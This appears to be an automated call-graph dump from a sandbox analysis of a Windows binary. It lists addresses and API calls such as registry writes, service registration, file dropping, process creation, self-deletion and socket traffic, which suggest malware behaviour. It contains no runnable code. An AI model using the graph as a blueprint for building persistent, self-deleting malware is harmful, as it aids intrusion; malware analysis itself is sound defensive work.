8066->8067 8067->8065 8067->8066 7980 25143d2 7981 25143e0 7980->7981 7982 25143ef 7981->7982 7984 2511940 7981->7984 7985 251ec2e codecvt 4 API calls 7984->7985 7986 2511949 7985->7986 7986->7982 8068 2514e92 GetTickCount 8069 2514ec0 InterlockedExchange 8068->8069 8070 2514ec9 8069->8070 8071 2514ead GetTickCount 8069->8071 8071->8070 8072 2514eb8 Sleep 8071->8072 8072->8069 8073 2518314 8074 251675c 21 API calls 8073->8074 8075 2518324 8074->8075 8076 2515099 8077 2514bd1 4 API calls 8076->8077 8078 25150a2 8077->8078 7987 251195b 7988 2511971 7987->7988 7989 251196b 7987->7989 7990 251ec2e codecvt 4 API calls 7989->7990 7990->7988 8079 251f483 WSAStartup 8080 2515c05 IsBadWritePtr 8081 2515c24 IsBadWritePtr 8080->8081 8088 2515ca6 8080->8088 8083 2515c32 8081->8083 8081->8088 8082 2515c82 8085 2514bd1 4 API calls 8082->8085 8083->8082 8084 2514bd1 4 API calls 8083->8084 8084->8082 8086 2515c90 8085->8086 8087 2515472 18 API calls 8086->8087 8087->8088 8089 251f304 8092 251f26d setsockopt setsockopt setsockopt setsockopt setsockopt 8089->8092 8091 251f312 8092->8091 8093 2515b84 IsBadWritePtr 8094 2515b99 8093->8094 8095 2515b9d 8093->8095 8096 2514bd1 4 API calls 8095->8096 8097 2515bcc 8096->8097 8098 2515472 18 API calls 8097->8098 8099 2515be5 8098->8099 7991 251e749 7992 251dd05 6 API calls 7991->7992 7993 251e751 7992->7993 7994 251e781 lstrcmpA 7993->7994 7995 251e799 7993->7995 7994->7993 7996 251444a 7997 2514458 7996->7997 7998 251446a 7997->7998 7999 2511940 4 API calls 7997->7999 7999->7998 8000 2515e4d 8001 2515048 8 API calls 8000->8001 8002 2515e55 8001->8002 8003 2515e64 8002->8003 8004 2511940 4 API calls 8002->8004 8004->8003 8113 2515e0d 8116 25150dc 8113->8116 8115 2515e20 8117 2514bd1 4 API calls 8116->8117 8118 25150f2 8117->8118 8119 2514ae6 8 API calls 8118->8119 8125 25150ff 8119->8125 8120 2515130 8121 2514ae6 8 API calls 8120->8121 8123 2515138 8121->8123 8122 2514ae6 8 API calls 8124 2515110 lstrcmpA 8122->8124 8126 251516e 8123->8126 8128 2514ae6 8 API calls 8123->8128 8158 251513e 8123->8158 8124->8120 8124->8125 8125->8120 8125->8122 8127 2514ae6 8 API calls 8125->8127 8129 2514ae6 8 API calls 8126->8129 8126->8158 8127->8125 8130 251515e 8128->8130 8131 25151b6 8129->8131 8130->8126 8133 2514ae6 8 API calls 8130->8133 8159 2514a3d 8131->8159 8133->8126 8135 2514ae6 8 API calls 8136 25151c7 8135->8136 8137 2514ae6 8 API calls 8136->8137 8138 25151d7 8137->8138 8139 2514ae6 8 API calls 8138->8139 8140 25151e7 8139->8140 8141 2514ae6 8 API calls 8140->8141 8140->8158 8142 2515219 8141->8142 8143 2514ae6 8 API calls 8142->8143 8144 2515227 8143->8144 8145 2514ae6 8 API calls 8144->8145 8146 251524f lstrcpyA 8145->8146 8147 2514ae6 8 API calls 8146->8147 8151 2515263 8147->8151 8148 2514ae6 8 API calls 8149 2515315 8148->8149 8150 2514ae6 8 API calls 8149->8150 8152 2515323 8150->8152 8151->8148 8153 2514ae6 8 API calls 8152->8153 8155 2515331 8153->8155 8154 2514ae6 8 API calls 8154->8155 8155->8154 8156 2514ae6 8 API calls 8155->8156 8155->8158 8157 2515351 lstrcmpA 8156->8157 8157->8155 8157->8158 8158->8115 8160 2514a53 8159->8160 8161 2514a4a 8159->8161 8163 2514a78 8160->8163 8164 251ebed 8 API calls 8160->8164 8162 251ebed 8 API calls 8161->8162 8162->8160 8165 2514aa3 8163->8165 8166 2514a8e 8163->8166 8164->8163 8167 2514a9b 8165->8167 8169 251ebed 8 API calls 8165->8169 8166->8167 8168 251ec2e codecvt 4 API calls 8166->8168 8167->8135 8168->8167 8169->8167 8170 2514c0d 8171 2514ae6 8 API calls 8170->8171 8172 2514c17 8171->8172 8173 251be31 lstrcmpiA 8174 251be55 lstrcmpiA 8173->8174 8181 251be71 8173->8181 8175 251be61 lstrcmpiA 8174->8175 8174->8181 8178 251bfc8 8175->8178 8175->8181 8176 251bf62 lstrcmpiA 8177 251bf77 lstrcmpiA 8176->8177 8180 251bf70 8176->8180 8179 251bf8c lstrcmpiA 8177->8179 8177->8180 8179->8180 8180->8178 8182 251bfc2 8180->8182 8183 251ec2e codecvt 4 API calls 8180->8183 8181->8176 8184 251ebcc 4 API calls 8181->8184 8185 251ec2e codecvt 4 API calls 8182->8185 8183->8180 8188 251beb6 8184->8188 8185->8178 8186 251ebcc 4 API calls 8186->8188 8187 251bf5a 8187->8176 8188->8176 8188->8178 8188->8186 8188->8187 8189 2515d34 IsBadWritePtr 8190 2515d47 8189->8190 8191 2515d4a 8189->8191 8192 2515389 12 API calls 8191->8192 8193 2515d80 8192->8193 8017 2514861 IsBadWritePtr 8018 2514876 8017->8018 8019 2519961 RegisterServiceCtrlHandlerA 8020 251997d 8019->8020 8021 25199cb 8019->8021 8029 2519892 8020->8029 8023 251999a 8024 25199ba 8023->8024 8025 2519892 SetServiceStatus 8023->8025 8024->8021 8027 2519892 SetServiceStatus 8024->8027 8026 25199aa 8025->8026 8026->8024 8028 25198f2 41 API calls 8026->8028 8027->8021 8028->8024 8030 25198c2 SetServiceStatus 8029->8030 8030->8023 8194 2515e21 8195 2515e36 8194->8195 8196 2515e29 8194->8196 8197 25150dc 17 API calls 8196->8197 8197->8195 8032 2514960 8033 251496d 8032->8033 8035 251497d 8032->8035 8034 251ebed 8 API calls 8033->8034 8034->8035 8198 25135a5 8199 25130fa 4 API calls 8198->8199 8201 25135b3 8199->8201 8200 25135ea 8201->8200 8205 251355d 8201->8205 8203 25135da 8203->8200 8204 251355d 4 API calls 8203->8204 8204->8200 8206 251f04e 4 API calls 8205->8206 8207 251356a 8206->8207 8207->8203 8208 2515029 8213 2514a02 8208->8213 8214 2514a12 8213->8214 8215 2514a18 8213->8215 8216 251ec2e codecvt 4 API calls 8214->8216 8217 2514a26 8215->8217 8218 251ec2e codecvt 4 API calls 8215->8218 8216->8215 8219 251ec2e codecvt 4 API calls 8217->8219 8220 2514a34 8217->8220 8218->8217 8219->8220 6152 2519a6b SetErrorMode SetErrorMode SetUnhandledExceptionFilter 6268 251ec54 GetSystemTimeAsFileTime GetVolumeInformationA 6152->6268 6155 2519aa3 GetModuleHandleA GetModuleFileNameA 6168 2519ac4 6155->6168 6156 251a41c CreateThread WSAStartup 6270 251e52e 6156->6270 7341 251405e CreateEventA 6156->7341 6158 2519afd GetCommandLineA 6169 2519b22 6158->6169 6159 251a406 DeleteFileA 6161 251a3cc 6159->6161 6162 251a40d 6159->6162 6160 251a445 6289 251eaaf 6160->6289 6161->6156 6161->6159 6161->6162 6164 251a3ed GetLastError 6161->6164 6162->6156 6164->6162 6166 251a3f8 Sleep 6164->6166 6165 251a44d 6293 2511d96 6165->6293 6166->6159 6168->6158 6172 2519c0c 6169->6172 6179 2519b47 6169->6179 6532 25196aa 6172->6532 6183 2519b96 lstrlenA 6179->6183 6186 2519b58 6179->6186 6180 251a1d2 6187 251a1e3 GetCommandLineA 6180->6187 6181 2519c39 6184 251a167 GetModuleHandleA GetModuleFileNameA 6181->6184 6538 2514280 CreateEventA 6181->6538 6183->6186 6185 2519c05 ExitProcess 6184->6185 6189 251a189 6184->6189 6186->6185 6491 251675c 6186->6491 6212 251a205 6187->6212 6189->6185 6195 251a1b2 GetDriveTypeA 6189->6195 6195->6185 6198 251a1c5 6195->6198 6639 2519145 GetModuleHandleA GetModuleFileNameA CharToOemA 6198->6639 6199 251675c 21 API calls 6201 2519c79 6199->6201 6201->6184 6208 2519ca0 GetTempPathA 6201->6208 6209 2519e3e 6201->6209 6202 2519bff 6202->6185 6204 251a49f GetTickCount 6205 251a491 6204->6205 6206 251a4be Sleep 6204->6206 6205->6204 6205->6206 6211 251a4b7 GetTickCount 6205->6211 6387 251c913 6205->6387 6206->6205 6208->6209 6210 2519cba 6208->6210 6215 2519e6b GetEnvironmentVariableA 6209->6215 6222 2519e04 6209->6222 6564 25199d2 lstrcpyA 6210->6564 6211->6206 6216 251a285 lstrlenA 6212->6216 6228 251a239 6212->6228 6218 2519e7d 6215->6218 6215->6222 6216->6228 6219 25199d2 16 API calls 6218->6219 6221 2519e9d 6219->6221 6221->6222 6227 2519eb0 lstrcpyA lstrlenA 6221->6227 6634 251ec2e 6222->6634 6225 2519d5f 6578 2516cc9 6225->6578 6226 251a3c2 6651 25198f2 6226->6651 6231 2519ef4 6227->6231 6647 2516ec3 6228->6647 6235 2516dc2 6 API calls 6231->6235 6237 2519f03 6231->6237 6232 251a39d StartServiceCtrlDispatcherA 6232->6226 6233 2519d72 lstrcpyA lstrcatA lstrcatA 6236 2519cf6 6233->6236 6234 251a3c7 6234->6161 6235->6237 6587 2519326 6236->6587 6238 2519f32 RegOpenKeyExA 6237->6238 6239 2519f48 RegSetValueExA RegCloseKey 6238->6239 6243 2519f70 6238->6243 6239->6243 6240 251a35f 6240->6226 6240->6232 6248 2519f9d GetModuleHandleA GetModuleFileNameA 6243->6248 6244 2519e0c DeleteFileA 6244->6209 6245 2519dde GetFileAttributesExA 6245->6244 6247 2519df7 6245->6247 6247->6222 6624 25196ff 6247->6624 6250 2519fc2 6248->6250 6251 251a093 6248->6251 6250->6251 6256 2519ff1 GetDriveTypeA 6250->6256 6252 251a103 CreateProcessA 6251->6252 6255 251a0a4 wsprintfA 6251->6255 6253 251a13a 6252->6253 6254 251a12a DeleteFileA 6252->6254 6253->6222 6260 25196ff 3 API calls 6253->6260 6254->6253 6630 2512544 6255->6630 6256->6251 6258 251a00d 6256->6258 6263 251a02d lstrcatA 6258->6263 6260->6222 6264 251a046 6263->6264 6265 251a052 lstrcatA 6264->6265 6266 251a064 lstrcatA 6264->6266 6265->6266 6266->6251 6267 251a081 lstrcatA 6266->6267 6267->6251 6269 2519a95 6268->6269 6269->6155 6269->6161 6658 251dd05 GetTickCount 6270->6658 6272 251e538 6666 251dbcf 6272->6666 6274 251e544 6275 251e555 GetFileSize 6274->6275 6280 251e5b8 6274->6280 6276 251e5b1 CloseHandle 6275->6276 6277 251e566 6275->6277 6276->6280 6690 251db2e 6277->6690 6676 251e3ca RegOpenKeyExA 6280->6676 6281 251e576 ReadFile 6281->6276 6282 251e58d 6281->6282 6694 251e332 6282->6694 6285 251e5f2 6287 251e629 6285->6287 6288 251e3ca 19 API calls 6285->6288 6287->6160 6288->6287 6290 251eabe 6289->6290 6292 251eaba 6289->6292 6291 251dd05 6 API calls 6290->6291 6290->6292 6291->6292 6292->6165 6294 251ee2a 6293->6294 6295 2511db4 GetVersionExA 6294->6295 6296 2511dd0 GetSystemInfo GetModuleHandleA GetProcAddress 6295->6296 6298 2511e24 6296->6298 6299 2511e16 GetCurrentProcess 6296->6299 6752 251e819 6298->6752 6299->6298 6301 2511e3d 6302 251e819 11 API calls 6301->6302 6303 2511e4e 6302->6303 6304 2511e77 6303->6304 6793 251df70 6303->6793 6759 251ea84 6304->6759 6308 2511e6c 6310 251df70 12 API calls 6308->6310 6309 251e819 11 API calls 6311 2511e93 6309->6311 6310->6304 6763 251199c inet_addr LoadLibraryA 6311->6763 6314 251e819 11 API calls 6315 2511eb9 6314->6315 6317 251f04e 4 API calls 6315->6317 6321 2511ed8 6315->6321 6316 251e819 11 API calls 6319 2511eee 6316->6319 6318 2511ec9 6317->6318 6320 251ea84 30 API calls 6318->6320 6329 2511f0a 6319->6329 6777 2511b71 6319->6777 6320->6321 6321->6316 6323 251e819 11 API calls 6325 2511f23 6323->6325 6324 2511efd 6326 251ea84 30 API calls 6324->6326 6327 2511f3f 6325->6327 6781 2511bdf 6325->6781 6326->6329 6328 251e819 11 API calls 6327->6328 6331 2511f5e 6328->6331 6329->6323 6333 2511f77 6331->6333 6335 251ea84 30 API calls 6331->6335 6789 25130b5 6333->6789 6334 251ea84 30 API calls 6334->6327 6335->6333 6338 2516ec3 2 API calls 6339 2511f8e 6338->6339 6340 25180c9 6339->6340 6341 2516ec3 2 API calls 6340->6341 6342 25180eb 6341->6342 6343 25180f9 6342->6343 6344 25180ef 6342->6344 6860 251704c 6343->6860 6847 2517ee6 6344->6847 6347 2518110 6348 25180f4 6347->6348 6350 2518156 RegOpenKeyExA 6347->6350 6349 251675c 21 API calls 6348->6349 6359 2518269 CreateThread 6348->6359 6353 2518244 6349->6353 6351 251816d RegQueryValueExA 6350->6351 6356 2518216 6350->6356 6352 25181f7 6351->6352 6355 251818d 6351->6355 6354 251820d RegCloseKey 6352->6354 6358 251ec2e codecvt 4 API calls 6352->6358 6357 251ec2e codecvt 4 API calls 6353->6357 6353->6359 6354->6356 6355->6352 6360 251ebcc 4 API calls 6355->6360 6356->6348 6357->6359 6365 25181dd 6358->6365 6366 2515e6c 6359->6366 7320 251877e 6359->7320 6361 25181a0 6360->6361 6361->6354 6362 25181aa RegQueryValueExA 6361->6362 6362->6352 6363 25181c4 6362->6363 6364 251ebcc 4 API calls 6363->6364 6364->6365 6365->6354 6367 251ec54 2 API calls 6366->6367 6368 2515e71 6367->6368 6962 251e654 6368->6962 6370 2515ec1 6371 2513132 6370->6371 6372 251df70 12 API calls 6371->6372 6373 251313b 6372->6373 6374 251c125 6373->6374 6375 251ec54 2 API calls 6374->6375 6376 251c12d 6375->6376 6377 251e654 13 API calls 6376->6377 6378 251c2bd 6377->6378 6379 251e654 13 API calls 6378->6379 6380 251c2c9 6379->6380 6381 251e654 13 API calls 6380->6381 6382 251a47a 6381->6382 6383 2518db1 6382->6383 6384 2518dbc 6383->6384 6385 251e654 13 API calls 6384->6385 6386 2518dec Sleep 6385->6386 6386->6205 6388 251c92f 6387->6388 6389 251c93c 6388->6389 6984 251c517 6388->6984 6391 251ca2b 6389->6391 6392 251e819 11 API calls 6389->6392 6391->6205 6393 251c96a 6392->6393 6394 251e819 11 API calls 6393->6394 6395 251c97d 6394->6395 6396 251e819 11 API calls 6395->6396 6397 251c990 6396->6397 6398 251c9aa 6397->6398 6399 251ebcc 4 API calls 6397->6399 6398->6391 6973 2512684 6398->6973 6399->6398 6404 251ca26 7001 251c8aa 6404->7001 6407 251ca44 6408 251ca4b closesocket 6407->6408 6409 251ca83 6407->6409 6408->6404 6410 251ea84 30 API calls 6409->6410 6411 251caac 6410->6411 6412 251f04e 4 API calls 6411->6412 6413 251cab2 6412->6413 6414 251ea84 30 API calls 6413->6414 6415 251caca 6414->6415 6416 251ea84 30 API calls 6415->6416 6417 251cad9 6416->6417 7005 251c65c 6417->7005 6420 251cb60 closesocket 6420->6391 6422 251dad2 closesocket 6423 251e318 23 API calls 6422->6423 6424 251dae0 6423->6424 6424->6391 6425 251df4c 20 API calls 6485 251cb70 6425->6485 6430 251c65c send GetProcessHeap HeapSize GetProcessHeap RtlAllocateHeap 6430->6485 6431 251e654 13 API calls 6431->6485 6437 251ea84 30 API calls 6437->6485 6438 251d569 closesocket Sleep 7052 251e318 6438->7052 6439 251d815 wsprintfA 6439->6485 6440 251cc1c GetTempPathA 6440->6485 6441 2517ead 6 API calls 6441->6485 6442 251c517 23 API calls 6442->6485 6444 251f04e LoadLibraryA GetProcAddress SystemTimeToFileTime GetSystemTimeAsFileTime 6444->6485 6445 251e8a1 30 API calls 6445->6485 6446 251d582 ExitProcess 6447 251cfe3 GetSystemDirectoryA 6447->6485 6448 251cfad GetEnvironmentVariableA 6448->6485 6449 251675c 21 API calls 6449->6485 6450 251d027 GetSystemDirectoryA 6450->6485 6451 251d105 lstrcatA 6451->6485 6452 251ef1e lstrlenA 6452->6485 6453 251cc9f CreateFileA 6455 251ccc6 WriteFile 6453->6455 6453->6485 6454 251ec2e GetProcessHeap HeapSize GetProcessHeap RtlFreeHeap codecvt 6454->6485 6458 251cced CloseHandle 6455->6458 6459 251cdcc CloseHandle 6455->6459 6456 251d15b CreateFileA 6457 251d182 WriteFile CloseHandle 6456->6457 6456->6485 6457->6485 6465 251cd2f 6458->6465 6459->6485 6460 251cd16 wsprintfA 6460->6465 6461 251d149 SetFileAttributesA 6461->6456 6462 251d36e GetEnvironmentVariableA 6462->6485 6463 251d1bf SetFileAttributesA 6463->6485 6464 2518e26 GetSystemTime SystemTimeToFileTime CreateFileW DeviceIoControl CloseHandle 6464->6485 6465->6460 7034 2517fcf 6465->7034 6466 251d22d GetEnvironmentVariableA 6466->6485 6467 251d3af lstrcatA 6469 251d3f2 CreateFileA 6467->6469 6467->6485 6472 251d415 WriteFile CloseHandle 6469->6472 6469->6485 6471 2517fcf 64 API calls 6471->6485 6472->6485 6473 251cd81 WaitForSingleObject CloseHandle CloseHandle 6475 251f04e 4 API calls 6473->6475 6474 251cda5 6476 2517ee6 64 API calls 6474->6476 6475->6474 6480 251cdbd DeleteFileA 6476->6480 6477 251d4b1 CreateProcessA 6481 251d4e8 CloseHandle CloseHandle 6477->6481 6477->6485 6478 251d3e0 SetFileAttributesA 6478->6469 6479 251d26e lstrcatA 6482 251d2b1 CreateFileA 6479->6482 6479->6485 6480->6485 6481->6485 6482->6485 6486 251d2d8 WriteFile CloseHandle 6482->6486 6483 2517ee6 64 API calls 6483->6485 6484 251d452 SetFileAttributesA 6484->6485 6485->6422 6485->6425 6485->6430 6485->6431 6485->6437 6485->6438 6485->6439 6485->6440 6485->6441 6485->6442 6485->6444 6485->6445 6485->6447 6485->6448 6485->6449 6485->6450 6485->6451 6485->6452 6485->6453 6485->6454 6485->6456 6485->6461 6485->6462 6485->6463 6485->6464 6485->6466 6485->6467 6485->6469 6485->6471 6485->6477 6485->6478 6485->6479 6485->6482 6485->6483 6485->6484 6488 251d29f SetFileAttributesA 6485->6488 6490 251d31d SetFileAttributesA 6485->6490 7013 251c75d 6485->7013 7025 2517e2f 6485->7025 7047 2517ead 6485->7047 7057 25131d0 6485->7057 7074 2513c09 6485->7074 7084 2513a00 6485->7084 7088 251e7b4 6485->7088 7091 251c06c 6485->7091 7097 2516f5f GetUserNameA 6485->7097 7108 251e854 6485->7108 7118 2517dd6 6485->7118 6486->6485 6488->6482 6490->6485 6492 2516784 CreateFileA 6491->6492 6493 251677a SetFileAttributesA 6491->6493 6494 25167b5 6492->6494 6495 25167a4 CreateFileA 6492->6495 6493->6492 6496 25167c5 6494->6496 6497 25167ba SetFileAttributesA 6494->6497 6495->6494 6498 2516977 6496->6498 6499 25167cf GetFileSize 6496->6499 6497->6496 6498->6185 6519 2516a60 CreateFileA 6498->6519 6500 25167e5 6499->6500 6518 2516965 6499->6518 6501 25167ed ReadFile 6500->6501 6500->6518 6503 2516811 SetFilePointer 6501->6503 6501->6518 6502 251696e FindCloseChangeNotification 6502->6498 6504 251682a ReadFile 6503->6504 6503->6518 6505 2516848 SetFilePointer 6504->6505 6504->6518 6506 2516867 6505->6506 6505->6518 6507 2516878 ReadFile 6506->6507 6509 25168d5 6506->6509 6508 25168d0 6507->6508 6510 2516891 6507->6510 6508->6509 6509->6502 6511 251ebcc 4 API calls 6509->6511 6510->6507 6510->6508 6512 25168f8 6511->6512 6513 2516900 SetFilePointer 6512->6513 6512->6518 6514 251695a 6513->6514 6515 251690d ReadFile 6513->6515 6517 251ec2e codecvt 4 API calls 6514->6517 6515->6514 6516 2516922 6515->6516 6516->6502 6517->6518 6518->6502 6520 2516b8c GetLastError 6519->6520 6521 2516a8f GetDiskFreeSpaceA 6519->6521 6523 2516b86 6520->6523 6522 2516ac5 6521->6522 6531 2516ad7 6521->6531 7203 251eb0e 6522->7203 6523->6202 6527 2516b56 CloseHandle 6527->6523 6530 2516b65 GetLastError CloseHandle 6527->6530 6528 2516b36 GetLastError CloseHandle 6529 2516b7f DeleteFileA 6528->6529 6529->6523 6530->6529 7207 2516987 6531->7207 6533 25196b9 6532->6533 6534 25173ff 17 API calls 6533->6534 6535 25196e2 6534->6535 6536 25196f7 6535->6536 6537 251704c 16 API calls 6535->6537 6536->6180 6536->6181 6537->6536 6539 25142a5 6538->6539 6540 251429d 6538->6540 7213 2513ecd 6539->7213 6540->6184 6540->6199 6542 25142b0 7217 2514000 6542->7217 6544 25143c1 CloseHandle 6544->6540 6545 25142b6 6545->6540 6545->6544 7223 2513f18 WriteFile 6545->7223 6550 25143ba CloseHandle 6550->6544 6551 2514318 6552 2513f18 4 API calls 6551->6552 6553 2514331 6552->6553 6554 2513f18 4 API calls 6553->6554 6555 251434a 6554->6555 6556 251ebcc 4 API calls 6555->6556 6557 2514350 6556->6557 6558 2513f18 4 API calls 6557->6558 6559 2514389 6558->6559 6560 251ec2e codecvt 4 API calls 6559->6560 6561 251438f 6560->6561 6562 2513f8c 4 API calls 6561->6562 6563 251439f CloseHandle CloseHandle 6562->6563 6563->6540 6565 25199eb 6564->6565 6566 2519a2f lstrcatA 6565->6566 6567 251ee2a 6566->6567 6568 2519a4b lstrcatA 6567->6568 6569 2516a60 13 API calls 6568->6569 6570 2519a60 6569->6570 6570->6209 6570->6236 6571 2516dc2 6570->6571 6572 2516e33 6571->6572 6573 2516dd7 6571->6573 6572->6225 6574 2516cc9 5 API calls 6573->6574 6575 2516ddc 6574->6575 6575->6575 6576 2516e02 GetVolumeInformationA 6575->6576 6577 2516e24 6575->6577 6576->6577 6577->6572 6579 2516cdc GetModuleHandleA GetProcAddress 6578->6579 6586 2516d8b 6578->6586 6580 2516d12 GetSystemDirectoryA 6579->6580 6583 2516cfd 6579->6583 6581 2516d27 GetWindowsDirectoryA 6580->6581 6582 2516d1e 6580->6582 6584 2516d42 6581->6584 6582->6581 6582->6586 6583->6580 6583->6586 6585 251ef1e lstrlenA 6584->6585 6585->6586 6586->6233 7231 2511910 6587->7231 6590 251934a GetModuleHandleA GetModuleFileNameA 6592 251937f 6590->6592 6593 25193a4 6592->6593 6594 25193d9 6592->6594 6596 25193c3 wsprintfA 6593->6596 6595 2519401 wsprintfA 6594->6595 6597 2519415 6595->6597 6596->6597 6600 2516cc9 5 API calls 6597->6600 6620 25194a0 6597->6620 6598 2516edd 5 API calls 6599 25194ac 6598->6599 6601 251962f 6599->6601 6603 25194e8 RegOpenKeyExA 6599->6603 6602 2519439 6600->6602 6609 2519646 6601->6609 7246 2511820 6601->7246 6611 251ef1e lstrlenA 6602->6611 6605 25194fb 6603->6605 6606 2519502 6603->6606 6605->6601 6608 251958a 6605->6608 6610 251951f RegQueryValueExA 6606->6610 6608->6609 6612 2519593 6608->6612 6616 25195d6 6609->6616 7252 25191eb 6609->7252 6613 2519530 6610->6613 6614 2519539 6610->6614 6615 2519462 6611->6615 6612->6616 7233 251f0e4 6612->7233 6617 251956e RegCloseKey 6613->6617 6618 2519556 RegQueryValueExA 6614->6618 6619 251947e wsprintfA 6615->6619 6616->6244 6616->6245 6617->6605 6618->6613 6618->6617 6619->6620 6620->6598 6622 25195bb 6622->6616 7240 25118e0 6622->7240 6625 2512544 6624->6625 6626 251972d RegOpenKeyExA 6625->6626 6627 2519740 6626->6627 6628 2519765 6626->6628 6629 251974f RegDeleteValueA RegCloseKey 6627->6629 6628->6222 6629->6628 6631 2512554 lstrcatA 6630->6631 6632 251ee2a 6631->6632 6633 251a0ec lstrcatA 6632->6633 6633->6252 6635 251ec37 6634->6635 6636 251a15d 6634->6636 6637 251eba0 codecvt 2 API calls 6635->6637 6636->6184 6636->6185 6638 251ec3d GetProcessHeap RtlFreeHeap 6637->6638 6638->6636 6640 2512544 6639->6640 6641 251919e wsprintfA 6640->6641 6642 25191bb 6641->6642 7291 2519064 GetTempPathA 6642->7291 6645 25191d5 ShellExecuteA 6646 25191e7 6645->6646 6646->6202 6648 2516ed5 6647->6648 6649 2516ecc 6647->6649 6648->6240 6650 2516e36 2 API calls 6649->6650 6650->6648 6652 25198f6 6651->6652 6653 2514280 30 API calls 6652->6653 6654 2519904 Sleep 6652->6654 6655 2519915 6652->6655 6653->6652 6654->6652 6654->6655 6657 2519947 6655->6657 7298 251977c 6655->7298 6657->6234 6659 251dd41 InterlockedExchange 6658->6659 6660 251dd20 GetCurrentThreadId 6659->6660 6661 251dd4a 6659->6661 6662 251dd53 GetCurrentThreadId 6660->6662 6663 251dd2e GetTickCount 6660->6663 6661->6662 6662->6272 6664 251dd39 Sleep 6663->6664 6665 251dd4c 6663->6665 6664->6659 6665->6662 6667 251dbf0 6666->6667 6699 251db67 GetEnvironmentVariableA 6667->6699 6669 251dc19 6670 251dcda 6669->6670 6671 251db67 3 API calls 6669->6671 6670->6274 6672 251dc5c 6671->6672 6672->6670 6673 251db67 3 API calls 6672->6673 6674 251dc9b 6673->6674 6674->6670 6675 251db67 3 API calls 6674->6675 6675->6670 6677 251e528 6676->6677 6678 251e3f4 6676->6678 6677->6285 6679 251e434 RegQueryValueExA 6678->6679 6680 251e51d RegCloseKey 6679->6680 6681 251e458 6679->6681 6680->6677 6682 251e46e RegQueryValueExA 6681->6682 6682->6681 6683 251e488 6682->6683 6683->6680 6684 251db2e 8 API calls 6683->6684 6685 251e499 6684->6685 6685->6680 6686 251e4b9 RegQueryValueExA 6685->6686 6687 251e4e8 6685->6687 6686->6685 6686->6687 6687->6680 6688 251e332 14 API calls 6687->6688 6689 251e513 6688->6689 6689->6680 6691 251db55 6690->6691 6692 251db3a 6690->6692 6691->6276 6691->6281 6703 251ebed 6692->6703 6721 251f04e SystemTimeToFileTime GetSystemTimeAsFileTime 6694->6721 6696 251e3be 6696->6276 6697 251e342 6697->6696 6724 251de24 6697->6724 6700 251dbca 6699->6700 6702 251db89 lstrcpyA CreateFileA 6699->6702 6700->6669 6702->6669 6704 251ec01 6703->6704 6705 251ebf6 6703->6705 6715 251eba0 6704->6715 6712 251ebcc GetProcessHeap RtlAllocateHeap 6705->6712 6713 251eb74 2 API calls 6712->6713 6714 251ebe8 6713->6714 6714->6691 6716 251eba7 GetProcessHeap HeapSize 6715->6716 6717 251ebbf GetProcessHeap HeapReAlloc 6715->6717 6716->6717 6718 251eb74 6717->6718 6719 251eb7b GetProcessHeap HeapSize 6718->6719 6720 251eb93 6718->6720 6719->6720 6720->6691 6735 251eb41 6721->6735 6723 251f0b7 6723->6697 6725 251de3a 6724->6725 6731 251de4e 6725->6731 6744 251dd84 6725->6744 6728 251ebed 8 API calls 6733 251def6 6728->6733 6729 251de9e 6729->6728 6729->6731 6730 251de76 6748 251ddcf 6730->6748 6731->6697 6733->6731 6734 251ddcf lstrcmpA 6733->6734 6734->6731 6736 251eb61 6735->6736 6737 251eb4a 6735->6737 6736->6723 6740 251eae4 6737->6740 6739 251eb54 6739->6723 6739->6736 6741 251eb02 GetProcAddress 6740->6741 6742 251eaed LoadLibraryA 6740->6742 6741->6739 6742->6741 6743 251eb01 6742->6743 6743->6739 6745 251ddc5 6744->6745 6746 251dd96 6744->6746 6745->6729 6745->6730 6746->6745 6747 251ddad lstrcmpiA 6746->6747 6747->6745 6747->6746 6749 251dddd 6748->6749 6751 251de20 6748->6751 6750 251ddfa lstrcmpA 6749->6750 6749->6751 6750->6749 6751->6731 6753 251dd05 6 API calls 6752->6753 6754 251e821 6753->6754 6755 251dd84 lstrcmpiA 6754->6755 6756 251e82c 6755->6756 6757 251e844 6756->6757 6802 2512480 6756->6802 6757->6301 6760 251ea98 6759->6760 6811 251e8a1 6760->6811 6762 2511e84 6762->6309 6764 25119d5 GetProcAddress GetProcAddress GetProcAddress 6763->6764 6767 25119ce 6763->6767 6765 2511ab3 FreeLibrary 6764->6765 6766 2511a04 6764->6766 6765->6767 6766->6765 6768 2511a14 GetBestInterface GetProcessHeap 6766->6768 6767->6314 6768->6767 6769 2511a2e HeapAlloc 6768->6769 6769->6767 6770 2511a42 GetAdaptersInfo 6769->6770 6771 2511a62 6770->6771 6772 2511a52 HeapReAlloc 6770->6772 6773 2511aa1 FreeLibrary 6771->6773 6774 2511a69 GetAdaptersInfo 6771->6774 6772->6771 6773->6767 6774->6773 6775 2511a75 HeapFree 6774->6775 6775->6773 6839 2511ac3 LoadLibraryA 6777->6839 6780 2511bcf 6780->6324 6782 2511ac3 13 API calls 6781->6782 6783 2511c09 6782->6783 6784 2511c5a 6783->6784 6785 2511c0d GetComputerNameA 6783->6785 6784->6334 6786 2511c45 GetVolumeInformationA 6785->6786 6787 2511c1f 6785->6787 6786->6784 6787->6786 6788 2511c41 6787->6788 6788->6784 6790 251ee2a 6789->6790 6791 25130d0 gethostname gethostbyname 6790->6791 6792 2511f82 6791->6792 6792->6338 6792->6339 6794 251dd05 6 API calls 6793->6794 6795 251df7c 6794->6795 6796 251dd84 lstrcmpiA 6795->6796 6797 251df89 6796->6797 6798 251ddcf lstrcmpA 6797->6798 6799 251ec2e codecvt 4 API calls 6797->6799 6800 251dd84 lstrcmpiA 6797->6800 6801 251dfc4 6797->6801 6798->6797 6799->6797 6800->6797 6801->6308 6805 2512419 lstrlenA 6802->6805 6804 2512491 6804->6757 6806 2512474 6805->6806 6807 251243d lstrlenA 6805->6807 6806->6804 6808 2512464 lstrlenA 6807->6808 6809 251244e lstrcmpiA 6807->6809 6808->6806 6808->6807 6809->6808 6810 251245c 6809->6810 6810->6806 6810->6808 6812 251dd05 6 API calls 6811->6812 6813 251e8b4 6812->6813 6814 251dd84 lstrcmpiA 6813->6814 6815 251e8c0 6814->6815 6816 251e8c8 lstrcpynA 6815->6816 6826 251e90a 6815->6826 6817 251e8f5 6816->6817 6832 251df4c 6817->6832 6818 2512419 4 API calls 6819 251e926 lstrlenA lstrlenA 6818->6819 6821 251e96a 6819->6821 6822 251e94c lstrlenA 6819->6822 6825 251ebcc 4 API calls 6821->6825 6827 251ea27 6821->6827 6822->6821 6823 251e901 6824 251dd84 lstrcmpiA 6823->6824 6824->6826 6828 251e98f 6825->6828 6826->6818 6826->6827 6827->6762 6828->6827 6829 251df4c 20 